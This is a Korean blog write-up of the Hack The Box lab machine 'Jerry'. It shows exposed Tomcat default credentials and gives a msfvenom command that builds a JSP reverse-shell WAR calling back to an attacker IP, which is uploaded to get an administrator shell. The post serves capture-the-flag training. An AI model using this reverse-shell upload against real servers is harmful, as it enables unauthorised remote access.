Search
HTB-Jerry Write up
1 min read

HTB-Jerry Write up

UseeGod's Picture
UseeGod in HTB

Tomcat 페이지에서 war 형식의 reverse shell을 업로드하여 쉘을 획득하는 간단한 머신입니다

포트스캔

nmap scan 으로 8080포트가 열려있는것을 확인 가능합니다.

Untitled nmap 결과

리버스쉘 업로드

해당 포트로 접근 시 tomcat 페이지로 접근 가능하며 manage app 으로 접근 시 자격증명이 필요합니다

Untitled1 자격증명 필요

401 에러페이지에 자격증명 tomcat:s3cret 가 노출되고 있습니다

Untitled2 자격증명 노출

tomcat 페이지 기능으로 war 형식의 파일을 서버에 업로드 가능합니다.
msfvenom을 이용하여 리버스쉘을 제작하여 줍니다

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war -o attack.war

Untitled3 war 파일 업로드

루트쉘 획득

msfvenom 으로 작성한 리버스쉘 4444포트 개방 시 리버스쉘 연결 가능

Untitled4 리버스쉘 연결

administraotr 계정으로 리버스쉘을 획득하여 바로 flag획득 가능

Untitled5 flag획득

You may also like

HTB-Devzat Write up
1 min read

HTB-Devzat Write up

golang, git-dumper

UseeGod's Picture
UseeGod in HTB
HTB-Union Write up
2 min read

HTB-Union Write up

Union sql injection, group_concat

UseeGod's Picture
UseeGod in HTB
HTB-Time Write up
1 min read

HTB-Time Write up

JSON, jackson, pspy, tcpdump

UseeGod's Picture
UseeGod in HTB

Latest Posts

Web3 자료 모음
1 min read

Web3 자료 모음

UseeGod's Picture
UseeGod
토큰기반 인증에서 bearer 란?
2 min read

토큰기반 인증에서 bearer 란?

UseeGod's Picture
UseeGod

Explore Tags

Android BugBounty CVE CheatSheet Cloud Error Git HTB IOS Reversing Web Web3